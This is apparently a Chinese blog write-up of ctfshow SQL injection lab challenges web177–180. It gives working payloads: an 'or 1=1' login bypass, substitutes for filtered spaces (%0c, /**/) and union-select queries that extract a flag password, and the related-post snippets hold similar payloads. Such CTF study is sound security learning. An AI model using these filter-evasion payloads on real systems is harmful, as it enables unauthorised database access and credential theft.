ctfshow_web176~180

最新推荐文章于 2024-05-07 17:51:23 发布
最新推荐文章于 2024-05-07 17:51:23 发布
阅读量149 收藏
点赞数
文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_38634097/article/details/130918465
版权

此文章是为了记录本人对知识理解,如有错误望敬请指出并谅解。

web177
在这里插入图片描述

解题思路:题目说对传入的参数进行了过滤,但是我们不知道过滤了什么,所以第一步我们要先确认过在这里插入图片描述

滤了哪些特殊字符。在这里,我们使用burp进行检测。
在这里插入图片描述在这里插入图片描述在这里插入图片描述不知道为什么,没有检测出来,看了官方的wp,过滤了select,union的。我的思路是,既然过滤了,先检测过滤了哪些字符,然后避开,我认为这比盲猜靠谱。
最后我是用万能密码破的。
pyload:1’ or 1=1 --+

web178(空格过滤)
可代空格的字符:

%09
%0a
%0d  
%0c
/**/  
+

pyload:

1'union/**/select/**/1,2,password/**/from/**/ctfshow_user/**/where/**/username='flag'%23

在这里插入图片描述web179
也过滤了空格,将178中空格都试试,发现%0c没有被过滤:
于是构造pyload:

1'%0cunion%0cselect%0c1,2,(select%0cpassword%0cfrom%0cctfshow_user%0cwhere%0cusername='flag')%23

在这里插入图片描述
web180
通过测试发现注释符被过滤了,即–+,#,%23都不可以使用,我们换一种思路,把sql后面的‘闭合。
构造pyload:

'%0cunion%0cselect%0c1,2,(select%0cgroup_concat(password)%0cfrom%0cctfshow_user%0cwhere%0cusername='flag'%0cor'1'='1')'

得到如下结果:

在这里插入图片描述

Esther..
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
ctfshow-web41~60-WP
02-21
ctfshow-web41~60-WPctfshow-web41~60-WP
ctfshow web139命令盲注脚本
10-21
ctfshow靶场 web入门 web139 命令盲注脚本
ctfshow刷题记录6(sql注入1)
qq_61109509的博客
02-23 2985
有点杂。。。sql注入web171-173web174解法一 用replacet套娃解法二,布尔盲注脚本web 175解法一 时间盲注脚本解法二 利用读写文件写入网站根目录web176 大小写过滤解法一 万能密码出结果解法二 大小写过滤web177web178web179 sql注入 web171-173 六件套往上呼 1’ order by 3 – - 1’ union select 1,2,database() – - (无法用#进行注释,先用-- -) 爆列名:1’union selec
11.2web方向刷题笔记
m0_74806803的博客
11-02 32
获得flag:ctfshow{eb72e4c5-89a5-45de-b984-abeee0610e7d}1.根据提示存在过滤,大小写过滤试一试。1.题目过滤了空格,用/**/代替。
CTFSHOW WEB入门 sql注入 web176-
sinat_41572027的博客
07-15 402
CTFSHOW WEB入门 sql注入 web176-
ctfshow web入门 sql注入 过滤注入 web176
sinat_41572027的博客
07-10 132
ctfshow web入门 sql注入 过滤注入 web176
CTFSHOW WEB入门——sql注入
Chur的博客
07-22 3600
ctfshow 靶场 web入门 sql注入系列
CTFSHOW-WEB入门SQL注入部分(大概是长期更新)
Npceer-一位网安初学者的博客
02-01 573
SQL注入0x01 web 171 不一定会所有题都放上来(懒) 但是我尽量 0x01 web 171 总算是开始刷sql注入题了 之前学了 但是没写几题 也算个纯萌新了 所以基础题会细一点 也为了加强自己记忆 1,2,3都能回显 继续直接爆表名 1'union select 1,2,table_name from information_schema.tables where table_schema=database() --+ 直接爆字段 记得ctfshow_user要加'' 我试了半天不知道
CTFshow之web171~180---SQL注入(1)
金 帛的博客
06-04 1985
ctfshow,SQL注入的wp
CTFSHOW web183 正则爆破脚本
10-21
CTFSHOW web183 正则爆破脚本
ctfshow web184 正则爆破脚本0x16进制
10-21
ctfshow web184 正则爆破脚本0x16进制
ctfshow web189 无单引号,利用回显不同,盲注
10-21
ctfshow web189 无单引号,利用回显不同,盲注
ctfshow web入门 sql注入(持续更新)
Lum1n0us's Blog
07-13 1072
文章目录web171web172web173web174web175web176web177web178 web171 第一题嘛,都是最基础的,单引号闭合,用联合查询注入即可。 1' order by 3-- - -1' union select 1,2,3-- - # 库名是ctfshow_web -1' union select 1,database(),3-- - # 表名是ctfshow_user -1' union select 1,group_concat(table_name),3 fro
CTFshow刷题日记-WEB-SQL注入part1(171-184)
Love&Share
09-19 1042
SQL注入篇-共150道 mysql字符串函数 UPPER(s) 将字符串转换为大写 UCASE(s) 将字符串转换为大写 SUBSTRING(s, start, length) 从字符串 s 的 start 位置截取长度为 length 的子字符串 SUBSTRING_INDEX(s, delimiter, number) 返回从字符串 s 的第 number 个出现的分隔符 delimiter 之后的子串。 如果 number 是正数,返回第 number 个字符左边的字符串。
ctfshow-web入门-sql
qq_43618536的博客
07-10 920
ctfshow-web入门-sql
CTFSHOW web入门 sql注入 无过滤注入 web171-175
sinat_41572027的博客
07-07 1419
ctfshow web171-174
ctfshow web175-183
akxnxbshai的博客
03-14 5924
Web 175 if(!preg_match('/[\x00-\x7f]/i', json_encode($ret))) 刚开始不知道这句话是什莫意思,还在尝试之前的方法,发现没用。 \xnn 匹配ASCII代码中十六进制代码为nn的字符 [\x00-\x7f] 匹配ASCII值从0-127的字符 所以ASCII值得0-127都被过滤了,select没法用了。 只能盲注了,试一下 1' and sleep(6)--+ 发现确实有延迟,所以可以考虑时间盲注。 时间盲注: 通过时间
CTFshow——web入门——sql注入
h_adam的博客
03-14 5354
web入门——sql注入基础知识点判断是否注入order by 判断列数web171web172web173 基础知识点 判断是否注入 使用注释符–+ +代表的是空格 或者使用%23来做注释符 1' and 1=1%23 order by 判断列数 order by 是根据某一列进行排序 使用 1' order by 3--+ 返回正常 1' order by 4--+ 没有数据 说明列数是3 web171 本地测试,查询id为id = '9999' or id='3',9999不存在时会查询id=3
淤地坝安全监测预警系统解决方案
最新发布
weixin_48039531的博客
05-07 867
淤地坝智能监测预警管理系统利用历史数据与实时监测信息、模型计算、数据分析等技术手段,能够第一时间反馈淤地坝的运行管理动态,加之与交换共享的气象信息、实时水文预报信息等的整合分析,以降雨预报作为业务的出发点,实现中型淤地坝的预报预警及重要淤地坝的预演预案,提高淤地坝安全度汛能力,满足国家、部位要求的淤地坝“四预”度汛能力,需要对不同地区的径流系数进行逐一核准,在预演预案模块仅针对重点淤地坝,覆盖面较窄,应用探索深度不够,淤地坝四预系统仍需进一步深化完善,以便提供更科学、更高效的信息化手段。
ctfshow web2_故人心
10-07
ctfshow web2_故人心是一个CTF (Capture The Flag)比赛中的一个网页题目。根据提供的引用,可以看出这是一个PHP代码,其中使用了一些序列化和反序列化的操作。在代码中,如果传入的密码参数为'yu22x',则会包含flag....

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值